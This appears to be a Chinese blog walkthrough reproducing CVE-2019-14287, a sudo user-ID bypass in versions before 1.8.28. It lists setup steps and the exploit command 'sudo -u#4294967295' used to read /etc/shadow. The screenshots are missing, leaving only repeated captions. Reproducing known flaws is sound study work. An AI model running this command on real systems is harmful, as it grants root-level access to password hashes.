一、 漏洞成因
管理员在sudo配置文档中用了ALL关键字造成的。
sudo权限绕过漏洞,sudo,Linux系统管理命令,允许用户在不切换环境的前提下,以其他用户的权限运行应用程序或命令。
二、 影响版本
1.8.28之前的所有版本
三、 漏洞复现
1、 查看sudo版本
sudo -V
CVE-2019-14287复现
2、 新建账户
useradd test
passwd test
3、 修改sudo配置文件
vim /etc/sudoers
CVE-2019-14287复现
4、 切换到test用户
执行sudo命令
CVE-2019-14287复现
sudo -u#4294967295 cat/etc/shadow 或者
CVE-2019-14287复现
CVE-2019-14287复现
CVE-2019-14287复现

相关文章:

  • 2022-01-08
  • 2021-11-04
  • 2021-12-06
  • 2021-08-26
  • 2022-12-23
  • 2021-08-14
  • 2021-08-16
  • 2022-12-23
猜你喜欢
  • 2021-08-15
  • 2022-03-08
  • 2022-12-23
  • 2021-07-08
  • 2021-09-24
  • 2022-12-23
  • 2021-10-08
相关资源
相似解决方案